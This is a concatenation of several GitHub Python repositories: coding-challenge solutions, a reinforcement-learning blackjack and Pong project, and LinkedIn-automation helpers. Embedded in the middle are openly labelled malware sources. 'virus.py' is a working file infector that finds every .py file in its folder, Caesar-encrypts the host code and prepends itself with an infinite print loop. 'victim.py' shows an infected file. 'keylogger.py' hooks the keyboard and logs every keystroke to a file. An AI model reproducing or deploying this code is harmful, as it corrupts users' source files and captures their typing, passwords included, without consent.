root: TreeNode) -> int: # depth first search def dfs(node, paths, curr): if node is None: return if not node.left and not node.right: paths.append(curr+str(node.val)) return dfs(node.left, paths, curr+str(node.val)) dfs(node.right, paths, curr+str(node.val)) return paths ans = 0 paths = [] dfs(root, paths, '') if len(paths) > 0: for i in paths: ans += int(i, 2) return ans ``` #### File: CodingChallenges/python3/teemo_attacking.py ```python class Solution: def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int: if not timeSeries: return 0 ans = 0 start = timeSeries[0] end = timeSeries[0] + duration for t in timeSeries[1:]: if t < end: end = t + duration else: ans += (end - start) start = t end = t + duration ans += (end - start) return ans ``` #### File: CodingChallenges/python3/the_kth_factor_of_n.py ```python class Solution: def kthFactor(self, n: int, k: int) -> int: idx = 0 for i in range(1, n+1): if n%i == 0: idx += 1 if idx == k: return i return -1 ``` #### File: CodingChallenges/python3/toeplitz_matrix.py ```python class Solution: def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool: if len(matrix) == 0: return True if len(matrix[0]) == 0: return True ly = len(matrix) lx = len(matrix[0]) for y in range(ly-1): for x in range(lx-1): if matrix[y][x] != matrix[y+1][x+1]: return False return True ``` #### File: CodingChallenges/python3/unique_paths_obs.py ```python class Solution: def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int: row = len(obstacleGrid) col = len(obstacleGrid[0]) if (row == 1 and col == 1) and obstacleGrid[row-1][col-1] == 1: return 0 if obstacleGrid[row-1][col-1] == 1: return 0 # change obs to -1 for y in range(row): for x in range(col): if obstacleGrid[y][x] == 1: obstacleGrid[y][x] = -1 for i in range(row): for j in range(col): if obstacleGrid[i][j] == 0: if i == 0 and j == 0: obstacleGrid[i][j] = 1 elif i == 0: left = obstacleGrid[i][j-1] if obstacleGrid[i][j-1] != -1 else 0 obstacleGrid[i][j] = left elif j == 0: top = obstacleGrid[i-1][j] if obstacleGrid[i-1][j] != -1 else 0 obstacleGrid[i][j] = top else: top = obstacleGrid[i-1][j] left = obstacleGrid[i][j-1] if top == -1: top = 0 if left == -1: left = 0 obstacleGrid[i][j] = top + left print(obstacleGrid) return obstacleGrid[row-1][col-1] if obstacleGrid[row-1][col-1] != -1 else 0 ``` #### File: CodingChallenges/python3/unique_paths.py ```python class Solution: def uniquePaths(self, m: int, n: int) -> int: grid = [] for _ in range(n): grid.append([0]*m) for row in range(n): for col in range(m): if row == 0: grid[row][col] = 1 elif col == 0: grid[row][col] = 1 else: grid[row][col] = grid[row-1][col] + grid[row][col-1] return grid[n-1][m-1] ``` #### File: CodingChallenges/python3/valid_anagram.py ```python class Solution: def isAnagram(self, s: str, t: str) -> bool: s = sorted(s) t = sorted(t) return s == t ``` #### File: CodingChallenges/python3/validate_stack_sequences.py ```python class Solution: def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool: n = len(pushed) stack = [] i, j = 0, 0 while i < n or stack: if stack and stack[-1] == popped[j]: stack.pop() j += 1 elif i < n: stack.append(pushed[i]) i += 1 else: return False return True ``` #### File: CodingChallenges/python3/valid_palindrome.py ```python class Solution: def isPalindrome(self, s: str) -> bool: s_cp = s.replace(" ", "").lower() clean_s = '' for l in s_cp: # check if num if ord(l) >= 48 and ord(l) <= 57: clean_s += l elif ord(l) >= 97 and ord(l) <= 122: clean_s += l return clean_s == clean_s[::-1] ``` #### File: CodingChallenges/python3/vowel_cons_anagram.py ```python def get_factorial(n): res = 1 for i in range(1, n+1): res *= i return res def get_con_div(hashmap): res = 1 for key, val in hashmap.items(): if key not in ['A', 'E', 'I', 'O', 'U']: res *= get_factorial(val) return res def get_vow_div(hashmap): res = 1 for key, val in hashmap.items(): if key in ['A', 'E', 'I', 'O', 'U']: res *= get_factorial(val) return res def solution(S): vow = 0 con = 0 hashmap = {} for l in S: if l in ['A', 'E', 'I', 'O', 'U']: vow += 1 else: con += 1 if l not in hashmap: hashmap[l] = 1 else: hashmap[l] += 1 if con - vow not in [0, 1]: return 0 # print(vow, con, hashmap) res_con = (get_factorial(con)) / get_con_div(hashmap) res_vow = (get_factorial(vow)) / get_vow_div(hashmap) return int(res_con * res_vow) % 1000000007 res = solution("BOLOBOLO") print("res : {}".format(res)) ```
{ "source": "joshiarheinier/pyscript", "score": 3 }
#### File: pyscript/simple-virus-script/victim.py ```python def prankPrint(): while True: print(";slvrBlt;") prankPrint() l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 l = 10 zkloh l > 1: zkloh l%2==0: sulqw(l*l) l -=1 ghi wublqj(d): iru l lq udqjh(d): blhog l+3 d=wublqj(5) i = 10 while i > 1: while i%2==0: print(i*i) i -=1 i = 10 while i > 1: while i%2==0: print(i*i) i -=1 i = 10 while i > 1: while i%2==0: print(i*i) i -=1 i = 10 while i > 1: while i%2==0: print(i*i) i -=1 i = 10 while i > 1: while i%2==0: print(i*i) i -=1 i = 10 while i > 1: while i%2==0: print(i*i) i -=1 def trying(a): for i in range(a): yield i+3 a=trying(5) ``` #### File: pyscript/simple-virus-script/virus.py ```python def prankPrint(): #Make the 'injected stamp' function while True: print(";slvrBlt;") #damned import glob from string import * target = glob.glob("*.py") #Search for other python script for each in target: host = open(each,'r') hostcode = host.read() if hostcode.find(";slvrBlt;") == -1: vir_str = '' for string in hostcode: #Create the virus by crypting/changing its text if 64< ord(string) < 120: encrypt = chr(ord(string)+3) elif 119 < ord(string) < 123: encrypt = chr(ord(string)+3-26) else: encrypt = string vir_str += encrypt host = open(each,'w') virus = open(__file__,'r') tmp = virus.read() tmp = tmp[:tmp.find("#damned")]+'prankPrint()' mybody = tmp+chr(10)+vir_str+chr(10)+hostcode virus.close() host.write(mybody) #injecting the virus ```
{ "source": "joshiarheinier/Python-Keylogger-Linux-", "score": 3 }
#### File: joshiarheinier/Python-Keylogger-Linux-/keylogger.py ```python import pyxhook #this function is called everytime a key is pressed. #for every key pressed, it will be recorded to a text file #named record.log (You can edit the name and its directory) recordfile = "record.log" def OnKeyPress(event): recordKey = open(recordfile,"a") if event.Ascii==32: #32 is the ascii value of space recordKey.write(" ") elif event.Ascii==13: #10 is the ascii value of <Return> recordKey.write("\n") elif event.Ascii==96: #96 is the ascii value of the grave key (`) hook.cancel() else: recordKey.write(event.Key) recordKey.close() #initiate HookManager class hook=pyxhook.HookManager() #listen to all keys pressed hook.KeyDown=OnKeyPress #hook the keyboard hook.HookKeyboard() #start the keylogging hook.start() ```
{ "source": "joshiatul/game_playing", "score": 4 }
#### File: game_playing/environments/blackjack.py ```python import random from collections import namedtuple from . import environment import os # TODO Resolve for information <===> state.. unneccessary confusion class BlackJack(environment.AbstractGame): def __init__(self): self.action_space = ['hit', 'stay'] super(BlackJack, self).__init__('blackjack') def print_game_status(self): if self.decision: print "player decided to: " + self.decision print "player_hand: " + str(self.player_hand) + " with value: " + str(self.player_value) print "dealer_hand: " + str(self.dealer_hand) + " with value: " + str(self.dealer_value) print self.game_status @staticmethod def random_card(): """ Ace (1), 2, 3, 4, 5, 6, 7, 8, 9, 10, Jack (10), Queen (10), King (10) Ace can have value of 1 or 10 based on if other card values < 10 :return: random card """ card = random.randint(1, 13) if card > 10: return 10 return card @staticmethod def reevaluate_value(hand): """ This is assuming when to use usable_ace Ideally an algorithm should also learn this along with when to 'hit' and 'stay' """ val = sum(hand) if 1 in hand and val <= 11: return val + 10 else: return val def add_card_to_player(self, card): # card = random.choice([2,3,4,9,10]) #card = random.choice([10]) self.player_hand.extend([card]) self.player_value = self.reevaluate_value(self.player_hand) def add_card_to_dealer(self, card): # card = random.choice([9,8,3,2,4,5,6,1,7]) # card = random.choice([9, 2]) self.dealer_hand.extend([card]) self.dealer_value = self.reevaluate_value(self.dealer_hand) def evaluate_game(self, decision=False): """ :return: status """ status = 'in process' reward = False if not decision: if self.player_value == 21: if self.dealer_value != 21: status = 'player wins' else: status = 'draw' if decision == 'stay': if (self.dealer_value > 21): status = 'dealer busts and player wins' elif self.dealer_value == self.player_value: status = 'draw' elif self.dealer_value < self.player_value: status = 'player wins' elif self.dealer_value > self.player_value: status = 'player loses' if decision == 'hit': if self.player_value == 21: if self.dealer_value != 21: status = 'player wins' else: status = 'draw' elif self.player_value > 21: status = 'player busts and loses' elif self.player_value < 21: status = 'in process' # # win = 5, draw = 2, lose = 1 if status in ['player wins', 'dealer busts and player wins']: reward = 1 elif status == 'draw': reward = 0 elif status in ['player loses', 'player busts and loses']: reward = -1 return status, reward def reset(self): self.player_hand = [] self.dealer_hand = [] self.player_value = 0 self.dealer_value = 0 self.game_status = '' self.decision = '' self.state = () self.state_info = namedtuple('state_info', ['player_value', 'dealer_value']) self.information = None # Player gets two cards self.add_card_to_player(self.random_card()) self.add_card_to_player(self.random_card()) # Let's always hit if card total < 11 while self.player_value <= 11: self.add_card_to_player(self.random_card()) # Dealer opens a single card self.add_card_to_dealer(self.random_card()) # This card is really hidden from the player # self.add_card_to_dealer(self.random_card()) status, reward = self.evaluate_game() self.game_status = status #self.state = self.state_info(self.player_value, self.dealer_value) self.state = tuple('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state)) #self.information = self.state_info(self.player_value, self.dealer_value) return def evaluate_dealer(self): """ If player decides to stay: the dealer always follows this policy: hit until cards sum to 17 or more, then stay. :return: """ while self.dealer_value < 17: self.add_card_to_dealer(self.random_card()) def step(self, decision): self.decision = decision if decision == 'stay': # Evaluate game, dealer plays self.evaluate_dealer() status, reward = self.evaluate_game(decision) if decision == 'hit': # If hit, add new card to player's hand self.add_card_to_player(self.random_card()) status, reward = self.evaluate_game(decision) self.game_status = status #self.state = self.state_info(self.player_value, self.dealer_value) self.state = tuple(('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state))) #self.information = self.state_info(self.player_value, self.dealer_value) # Needs to return <observation, reward, done, info> done = True if self.game_status != 'in process' else False return self.state, reward, done, [] def complete_one_episode(self, banditAlgorithm, model=None): all_decision_states = [] while self.game_status == 'in process': # self.print_game_status() state = self.state_info(self.player_value, self.dealer_value) decision, prob = banditAlgorithm.select_decision_given_state(state, self.action_space, model=model, algorithm='epsilon-greedy') # Only terminal state returns a valid reward # Needs to return <observation, reward, done, info> gym compatible observation, reward, done, info = self.step(decision) all_decision_states.append((state, decision)) all_decision_states_tuple = tuple(all_decision_states) return all_decision_states_tuple, reward ``` #### File: joshiatul/game_playing/rl_learning.py ```python from model import Model import bandits import random import time import cPickle as pickle from collections import Counter, deque import numpy as np import os from environments.environment import Environment import threading import multiprocessing from multiprocessing.managers import BaseManager from itertools import izip # http://stackoverflow.com/questions/26499548/accessing-an-attribute-of-a-multiprocessing-proxy-of-a-class # http://stackoverflow.com/questions/28612412/how-can-i-share-a-class-between-processes-in-python def play_with_environment(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id=1, train=True, display_state=False): """ Simple temporal difference learning with experience-replay :return: """ env = make_environment(environment_params) epsilon = bandit_params.get('start_epsilon', 0.9) end_epsilon = bandits.sample_end_epsilon() model_class = 'random' if not model else model.return_model_class() X, y = [], [] if train and rl_params.get('memory_structure', 'asynchronus_methods') == 'experience_replay': experience_replay_obs = ExperienceReplay(type='deque', batchsize=rl_params['memory_structure_params']['batchsize'], experience_replay_size=rl_params['memory_structure_params'][ 'experience_replay_size'], minibatch_method=rl_params['memory_structure_params'][ 'minibatch_method']) if train: print "------ Starting thread: " + str(thread_id) + " with final epsilon ", end_epsilon time.sleep(3 * thread_id) for episode in xrange(1, epochs + 1): if not train and display_state: print "Game #-----: " + str(episode) # Initialize game and per episode counters current_state = env.reset() total_episodic_reward = 0 episodic_max_q = 0 if train and model.if_exists(): epsilon = bandits.decrement_epsilon(epochs, epsilon, bandit_params.get('anneal_epsilon_timesteps', 10000), end_epsilon) # Start playing the game for move in xrange(1, rl_params['max_steps'] + 1): if display_state: env.render() episodic_rewards = [] states = [] # Look n step ahead for _ in xrange(rl_params.get('n_steps_ahead', 1)): # Figure out best action based on policy action, max_q_value = bandits.select_action_with_epsilon_greedy_policy(current_state, env.action_space, model, epsilon=epsilon, test=not train) # Take step / observe reward / preprocess / update counters if not train and display_state: print "Taking action: #-----: " + str(action) new_state, reward, done, info = env.step(action) clipped_reward = env.clip_reward(reward, done) episodic_rewards.append(clipped_reward) states.append(current_state) total_episodic_reward += reward td_error = clipped_reward - max_q_value episodic_max_q += max_q_value # Update state current_state = new_state if done: break if train: bootstrapped_reward = return_bootstrapped_reward(env, model, new_state, done) for i in xrange(len(episodic_rewards) - 1, -1, -1): bootstrapped_reward = episodic_rewards[i] + rl_params['gamma'] * bootstrapped_reward if rl_params['memory_structure'] == 'experience_replay': X, y = generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y, episode_key=(episode, move), gamma=rl_params['gamma'], state_tuple=( states[i], action, bootstrapped_reward, new_state, done, episode, move, td_error)) else: X_new, y_new = model.return_design_matrix((states[i], action), bootstrapped_reward, weight=1) X.append(X_new) y.append(y_new) # Train model and reset design matrix model.fit(X, y) X, y = [], [] # Check game status and break if you have a result (printing only makes sense for gridworld) if done: if not train and display_state and clipped_reward > 0: print 'Player WINS!' if not train and display_state and clipped_reward < 0: print 'Player LOSES!' break # Record end of the episode statistics statistics.record_episodic_statistics(done, episode, move, clipped_reward, total_episodic_reward, episodic_max_q, epsilon=epsilon, train=train, model_class=model_class, thread_id=thread_id) # if train: # if thread_id == 4 and episode % 2000 == 0 and episode != epochs: # print "Saving model and continuing------------------" # model.save_and_continue() if not train: statistics.calculate_summary_statistics(model) return statistics.result else: print "------ Finishing thread: " + str(thread_id) + " -------------------------" def return_bootstrapped_reward(env, model, new_state, done): if not done and model.if_exists(): # non-terminal state # Get value estimate for that best action and update EXISTING reward max_q_action, max_q_value = bandits.return_action_based_on_greedy_policy(new_state, model, env.action_space) else: max_q_value = 0 return max_q_value class Statistics(object): def __init__(self, base_folder_name, test): self.total_reward = 0 self.total_steps = 0 self.total_episodes = 0 self.result_file = open(base_folder_name + '/result.data', 'w') if not test else None self.result = {} self.batch_mse_stat = [] def record_episodic_statistics(self, done, episode, total_moves, step_reward, total_episodic_reward, episodic_max_q, epsilon, train=True, model_class=None, thread_id=1): """ For now record statistics only if episode is ended OR max steps are done """ avg_max_q = episodic_max_q * 1.0 / total_moves res_line = 'Episode:{0}, total_steps:{1}, total_reward:{2}, final_reward:{3}, avg_q_value:{4}, epsilon:{5}, thread:{6}'.format( episode, total_moves, total_episodic_reward, round(step_reward, 4), round(episodic_max_q), round(epsilon, 4), thread_id) if train: # print res_line self.result_file.write(res_line + "\n") self.total_reward = total_episodic_reward self.total_episodes = episode model_type = 'random' if not model_class else model_class if model_type not in self.result: self.result[model_type] = Counter() if done: if total_episodic_reward > 0: self.result[model_type]['player wins'] += 1 else: self.result[model_type]['player loses'] += 1 else: self.result[model_type]['in process'] += 1 def calculate_summary_statistics(self, model_class=None): model_type = 'random' if not model_class else model_class if model_type in self.result: self.result[model_type]['avgerage_reward_per_episode'] = round( self.total_reward * 1.0 / max(self.total_episodes, 1), 2) self.total_reward = 0 self.total_episodes = 0 try: self.result_file.close() except: pass class ModelManager(BaseManager): pass def train_with_threads(environment_params, rl_params, bandit_params, model_params, epochs, num_of_threads, train=True, display_state=False, use_processes=False): start_time = time.time() # Initialize statistics and model here and pass it as an argument test = not train model_params['base_folder_name'] = return_base_path(environment_params['env_name']) model_params['actor_critic_model'] = rl_params['memory_structure_params'].get('actor_critic_method', False) statistics = Statistics(base_folder_name=model_params['base_folder_name'], test=test) env_name = 'non_atari' if environment_params['env_name'] == 'gridworld' else 'atari' resume = model_params.get('resume', False) if not use_processes: model = Model(model_params) model.initialize(test, resume) actor_learner_threads = [ threading.Thread(target=play_with_environment_pong if env_name == 'atari' else play_with_environment, args=( environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id, train, display_state)) for thread_id in xrange(1, num_of_threads + 1)] # Multiprocessing process else: # We will need to register Model class if we want to share model object ModelManager.register('Model', Model) manager = ModelManager() manager.start() model = manager.Model(model_params) model.initialize(test, resume) actor_learner_threads = [ multiprocessing.Process(target=play_with_environment_pong if env_name == 'atari' else play_with_environment, args=( environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id, train, display_state)) for thread_id in xrange(1, num_of_threads + 1)] for t in actor_learner_threads: t.start() for t in actor_learner_threads: t.join() if train: model.finish() # statistics.calculate_summary_statistics(model.return_model_class()) print "elapsed time:" + str(int(time.time() - start_time)) # return statistics.result def return_base_path(name): directory = os.path.dirname(os.path.realpath(__file__)) + '/solved_environments/' + name if not os.path.exists(directory): os.makedirs(directory) return directory def make_environment(environment_params): if environment_params['env_name'] == 'gridworld': from environments.gridworld import GridWorld env = GridWorld(environment_params['grid_size']) else: env = Environment(environment_params['env_name'], grid_size=environment_params['grid_size'], last_n=environment_params['last_n'], delta_preprocessing=environment_params['delta_preprocessing']) return env def test_trained_model_with_random_play(environment_params, test_games, render=False): print "---------- Testing policy:-----------" base_folder = return_base_path(environment_params['env_name']) model = pickle.load(open(base_folder + '/model_obs.pkl', mode='rb')) model.initialize(test=True) statistics = Statistics(base_folder_name=base_folder, test=True) # First test with trained model print "---------- Testing trained VW model -------" if environment_params['env_name'] == 'gridworld': play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={}, epochs=test_games, train=False, display_state=render) else: play_with_environment_pong(environment_params, model, statistics, rl_params={}, bandit_params={'start_epsilon': 0.0}, epochs=test_games, thread_id=8, train=False, display_state=True) # Now with random model print "---------- Testing Random model -----------" model = None if environment_params['env_name'] == 'gridworld': play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={}, epochs=test_games, train=False, display_state=False) else: play_with_environment_pong(environment_params, model, statistics, rl_params={}, bandit_params={}, epochs=test_games, thread_id=1, train=False, display_state=render) return statistics.result # ------- Pong functions TEST ------------------------------------------------------ def choose_action_greedy_policy(current_sparse_state, model, action_space): q_value_table = [] for a in action_space: fv = current_sparse_state + " |decision action_" + str(a) q_value_table.append(model.predict(fv)) max_value = max(q_value_table) max_index = q_value_table.index(max_value) return action_space[max_index] def play_with_environment_pong(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id, train=True, display_state=False): gamma = rl_params.get('gamma', 0.99) # discount factor for reward model_trained = False if train or not model else True epsilon = bandit_params.get('start_epsilon', 0.5) np.random.seed(0) end_epsilon = bandits.sample_end_epsilon() anneal_epsilon_timesteps = bandit_params.get('anneal_epsilon_timesteps', 2000) env = make_environment(environment_params) # env.env.seed(1) xs, drs, dm = [], [], [] running_reward = None for episode_number in xrange(1, epochs + 1): reward_sum = 0 observation = env.reset() # reset env current_sparse_state = env.preprocess_and_sparsify(observation) for _ in xrange(10000): if display_state: time.sleep(0.01) env.render() # Based on epsilon-greedy choose action if model_trained: if np.random.random() > epsilon: action = choose_action_greedy_policy(current_sparse_state, model, env.action_space) else: action = np.random.choice(env.action_space) else: action = np.random.choice(env.action_space) # record state (per vw sparse representation) xs.append(current_sparse_state + " |decision action_" + str(action)) # step the environment and get new measurements observation, reward, done, info = env.step(action) reward_sum += reward # record reward (has to be done after we call step() to get reward for previous action) drs.append(reward) # re-compute current_sparse_state current_sparse_state = env.preprocess_and_sparsify(observation) if reward != 0: running_add = 0 for iw, fv in izip(reversed(drs), reversed(xs)): running_add = running_add * gamma * 1.0 + iw pos_fv = str(running_add) + " " + fv dm.append(pos_fv) if train: model.fit(dm, y=[]) model_trained = True xs, drs, dm = [], [], [] # reset array memory if done: # an episode finished if epsilon > end_epsilon: epsilon -= ((1.0 - end_epsilon) / anneal_epsilon_timesteps) epsilon = max(epsilon, end_epsilon) # Keep track of running reward running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01 if train: model.compute_running_reward(episode_number, thread_id, reward_sum, running_reward, epsilon) else: print 'Episode: %d resetting env. episode reward total was %f. running mean: %f' % ( episode_number, reward_sum, running_reward) statistics.record_episodic_statistics(done, episode=episode_number, total_moves=_, step_reward=reward_sum, total_episodic_reward=running_reward, episodic_max_q=running_reward, epsilon=epsilon, train=train, model_class='async', thread_id=thread_id) break # -------------- Experience-replay Class and Methods -------------------------------------------------- class ExperienceReplay(object): def __init__(self, type, batchsize, experience_replay_size, minibatch_method='random'): self.type = type self.experience_replay_size = experience_replay_size self.minibatch_method = minibatch_method self.experience_replay = None self.batchsize = batchsize self.all_indices = range(experience_replay_size) # For stratified sampling self.positive_sample_fraction = 0.1 self.positive_batchsize = int(self.batchsize * self.positive_sample_fraction) self.negative_batchsize = self.batchsize - self.positive_batchsize self.experience_replay_positive = None self.experience_replay_negative = None self.positive_indices = range(int(experience_replay_size * self.positive_sample_fraction)) self.negative_indices = range(int(experience_replay_size * (1 - self.positive_sample_fraction))) self.max_positive_idx = None self.initialize() def initialize(self): if self.type == 'deque': self.experience_replay = deque(maxlen=self.experience_replay_size) pos_size = int(self.experience_replay_size * self.positive_sample_fraction) self.experience_replay_positive = deque(maxlen=pos_size) neg_size = self.experience_replay_size - pos_size self.experience_replay_negative = deque(maxlen=neg_size) # elif self.type == 'dict': # # {(episode, move): state_action_reward_tuple} # self.experience_replay = OrderedDict() def store_for_experience_replay(self, state_tuple, episode_move_key=None): old_state, best_known_decision, cumu_reward, new_state, done, episode, move, td_error = state_tuple if len(old_state) > 0 and len(new_state) > 0: if self.type == 'deque': if self.minibatch_method != 'stratified': self.experience_replay.appendleft(state_tuple) else: if cumu_reward > 0: self.experience_replay_positive.appendleft(state_tuple) else: self.experience_replay_negative.appendleft(state_tuple) # elif self.type == 'dict' and episode_move_key: # if len(self.experience_replay) == self.experience_replay_size: # _ = self.experience_replay.popitem(last=False) # self.experience_replay[episode_move_key] = state_tuple def return_minibatch(self): if self.minibatch_method == 'random': if self.type == 'deque': minibatch_indices = random.sample(self.all_indices, self.batchsize) # elif self.type == 'dict': # minibatch_indices = random.sample(self.experience_replay.keys(), self.batchsize) # Only work with deque type elif self.minibatch_method == 'prioritized': # Simple prioritization based on magnitude of reward total_reward_in_ex_replay = sum( max(abs(st[7]), (1.0 / self.experience_replay_size)) for st in self.experience_replay) probs = tuple( (max(abs(st[7]), (1.0 / self.experience_replay_size)) * 1.0 / total_reward_in_ex_replay for st in self.experience_replay)) minibatch_indices = list(np.random.choice(self.all_indices, self.batchsize, probs)) # Only work with deque type elif self.minibatch_method == 'stratified': if len(self.experience_replay_positive) >= self.positive_batchsize: minibatch_indices_positive = random.sample(self.positive_indices, self.positive_batchsize) else: minibatch_indices_positive = self.positive_indices minibatch_indices_negative = random.sample(self.negative_indices, self.negative_batchsize) # First positive indices and then negative indices - keep track of this minibatch_indices = minibatch_indices_positive + minibatch_indices_negative self.max_positive_idx = len(minibatch_indices_positive) return minibatch_indices def return_minibatch_sample(self, index, count=None): if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized': result = self.experience_replay[index] elif self.minibatch_method == 'stratified': try: if count < self.max_positive_idx: result = self.experience_replay_positive[index] else: result = self.experience_replay_negative[index] except Exception as e: print e return result def start_training(self): """ Start training only if experience replay memory is full """ if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized': start = False if len(self.experience_replay) < self.experience_replay_size else True elif self.minibatch_method == 'stratified': start = False if len(self.experience_replay_positive) + len( self.experience_replay_negative) < self.experience_replay_size else True return start def generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y, episode_key, gamma, state_tuple): experience_replay_obs.store_for_experience_replay(state_tuple, episode_key) # Start training only after buffer is full if experience_replay_obs.start_training(): # randomly sample our experience replay memory minibatch = experience_replay_obs.return_minibatch() # Now for each gameplay experience, update current reward based on the future reward (using action given by the model) for idx, index in enumerate(minibatch): example = experience_replay_obs.return_minibatch_sample(index, count=idx) current_state, action, bootstrapped_reward, new_state, done, episode, move, td_error = example X_new, y_new = model.return_design_matrix((current_state, action), bootstrapped_reward, weight=1) X.append(X_new) y.append(y_new) return X, y ```
{ "source": "JoshiAyush/LinkedIn-Automator", "score": 2 }
#### File: lib/utils/net.py ```python from typing import List import platform import subprocess def ping(host: str = None) -> bool: """Returns True if host (str) responds to a ping request. Remember that a host may not respond to a ping (ICMP) request even if the host name is valid. We avoid 'os.system' calls with 'subprocess.call' to avoid shell injection vulnerability. :Args: - host: {str} Hostname. :Returns: - {bool} True if server responds, false otherwise. """ if not host: host = "google.com" if platform.system().lower() == "windows": param = "-n" else: param = "-c" command: List[str] = ["ping", param, '1', host] return subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0 ``` #### File: lib/utils/type.py ```python from __future__ import annotations from typing import Any def _type(t: Any) -> str: """Function _type() returns the class name of the object given. :Args: - t: {Any} Object we need to find the class name for. :Returns: - {str} Class name if __name__ attribute is present otherwise None. """ try: return t.__name__ except AttributeError: return None """Function is_int() returns True if the instance given is an int. :Args: - field: {Any} Instance. :Returns: - {bool} True if the instance is an int otherwise False. """ is_int: function = lambda field: isinstance(field, int) """Function is_str() returns True if the instance given is an str. :Args: - field: {Any} Instance. :Returns: - {bool} True if the instance is an str otherwise False. """ is_str: function = lambda field: isinstance(field, str) """Function is_list() returns True if the instance given is an list. :Args: - field: {Any} Instance. :Returns: - {bool} True if the instance is an list otherwise False. """ is_list: function = lambda field: isinstance(field, list) """Function is_none() returns True if the instance given is None. :Args: - field: {Any} Instance. :Returns: - {bool} True if the instance is None otherwise False. """ is_none: function = lambda field: field is None def is_empty(field: str) -> bool: """Function is_empty() returns True if the instance given is empty. :Args: - field: {str} Instance. :Returns: - {bool} True if the given instance is empty otherwise False. """ if is_str(field): return field.strip() == '' return False def is_present(obj: Any, field: Any) -> bool: """Function is_present() returns True if the instance given contains the obj. :Args: - field: {Any} Instance. - obj: {Any} Instance to find. :Returns: - {bool} True if the instance given contains obj otherwise False. """ if not is_int(field): return obj in field return False ``` #### File: linkedin/message/template.py ```python from __future__ import annotations from typing import Dict import os import json import random import datetime from errors import ( TemplateFileException, TemplateFileNotSupportedException, TemplateMessageLengthExceededException, ) MY_NAMES = [ '{{my_name}}', '{{my_first_name}}', '{{my_last_name}}', '{{my_company_name}}', '{{my_position}}', ] NAMES = [ '{{name}}', '{{first_name}}', '{{last_name}}', '{{current_company}}', *MY_NAMES, ] OTHERS = [ '{{keyword}}', '{{location}}', '{{industry}}', '{{title}}', '{{school}}', '{{profile_language}}', '{{my_position}}', '{{position}}', '{{year}}', ] SUPPORTED_TEMP_FILES = ['.txt', ] DEFAULT_LANG = 'en-US' VAR_BEGN_BLK = 'VARIABLE BEGIN:' VAR_END_BLK = 'VARIABLE END;' TEMPL_BEGN_BLK = 'TEMPLATE BEGIN:' TEMPL_END_BLK = 'TEMPLATE END;' TEMPL_AVAIL = [ 'template_business', 'template_sales', 'template_real_estate', 'template_creative_industry', 'template_hr', 'template_include_industry', 'template_ben_franklin', 'template_virtual_coffee', 'template_common_connection_request', ] TEMPL_FILE_PATH = os.path.join(os.path.abspath(__file__)[0:os.path.abspath(__file__).find('template.py'):], 'templates.json') class Template: def __init__( self: Template, message_template: str, *, var_template: str, grammar_check: bool = True, use_template: str = None) -> None: if message_template is None: if use_template is None: return else: self._message = self.get_template_by_name(use_template) if use_template == 'template_common_connection_request': self._message = random.choice(self._message) elif os.path.isfile(message_template): self._message = self.load_message(message_template) else: self._message = message_template self.var_template = var_template self._enable_language_tool = grammar_check if self._enable_language_tool: import language_tool_python self._language_tool = language_tool_python.LanguageTool( language=DEFAULT_LANG) @staticmethod def get_template_by_name(name: str) -> str: if not name in TEMPL_AVAIL: raise TemplateFileException( f"Invalid template! Use any of these {TEMPL_AVAIL}") else: with open(TEMPL_FILE_PATH, 'r') as templ_file: data = json.load(templ_file) return data[name] def set_data(self: Template, data: Dict[str, str]) -> None: self._data = {} self._data = {**self._data, **{'{{name}}': data.pop('name', None)}} self._data = {**self._data, **{'{{first_name}}': data.pop('first_name', None)}} self._data = {**self._data, **{'{{last_name}}': data.pop('last_name', None)}} self._data = {**self._data, **{'{{keyword}}': data.pop('keyword', None)}} self._data = {**self._data, **{'{{location}}': data.pop('location', None)}} self._data = {**self._data, **{'{{industry}}': data.pop('industry', None)}} self._data = {**self._data, **{'{{title}}': data.pop('title', None)}} self._data = {**self._data, **{'{{school}}': data.pop('school', None)}} self._data = {**self._data, **{'{{current_company}}': data.pop('current_company', None)}} self._data = {**self._data, **{'{{profile_language}}': data.pop('profile_language', None)}} self._data = {**self._data, **{'{{position}}': data.pop('position', None)}} self._data = {**self._data, **{'{{year}}': data.pop('year', str(datetime.datetime.now().year))}} if self.var_template is not None and os.path.isfile(self.var_template): self.load_variable(self.var_template) @staticmethod def check_if_file_is_supported(path: str) -> bool: unmatched_temp_files_count = 0 for ext in SUPPORTED_TEMP_FILES: if not path.endswith(ext): unmatched_temp_files_count += 1 else: break if unmatched_temp_files_count == len(SUPPORTED_TEMP_FILES): return False return True @staticmethod def load_message(path: str) -> str: if Template.check_if_file_is_supported(path) is False: raise TemplateFileNotSupportedException( 'Template file %(file)s is not supported!' % {'file': path}) with open(path, 'r') as templ_file: message = templ_file.read() return message[message.find(TEMPL_BEGN_BLK)+len(TEMPL_BEGN_BLK):message.find(TEMPL_END_BLK):] def load_variable(self: Template, path: str) -> str: if self.check_if_file_is_supported(path) is False: raise TemplateFileNotSupportedException( 'Template file %(file)s is not supported!' % {'file': path}) with open(path, 'r') as templ_file: variables = templ_file.read() variables = variables[variables.find(VAR_BEGN_BLK)+len(VAR_BEGN_BLK):variables.find(VAR_END_BLK):] variables = variables.split('\n') for var in variables: if var == '': continue var_, val = var.split('=') 